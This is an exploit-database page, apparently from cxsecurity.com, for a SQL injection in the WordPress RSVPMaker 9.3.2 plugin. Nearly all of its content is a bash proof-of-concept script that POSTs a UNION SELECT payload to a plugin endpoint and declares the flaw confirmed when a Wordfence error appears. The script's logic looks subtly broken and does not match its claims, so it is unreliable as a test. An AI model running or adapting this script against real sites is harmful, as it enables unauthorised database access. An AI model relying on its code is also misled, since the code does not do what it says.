WordPress RSVPMaker 9.3.2 SQL Injection

2024.01.17
Credit: Amirhossein Bahramizadeh
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#!/bin/bash # Set the URL of the website running the vulnerable plugin url="http://example.com/wp-content/plugins/rsvpmaker/rsvpmaker-email.php" # Set the number of columns in the query columns=5 response=$(curl -s "$url") query=$(echo "$response" | grep -oP 'FROM .* WHERE .*') payload="' UNION SELECT 1,2,3,4,5-- " # Test the query with different numbers of columns for i in $(seq 1 $columns) do query_with_payload="${query%?*}?${payload:0:i}${query#*?}" curl -s -X POST -d "$query_with_payload" "$url" | grep -q "Wordfence Security Error" if [ $? -eq 0 ] then echo "Vulnerability confirmed with $i columns" break fi done


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top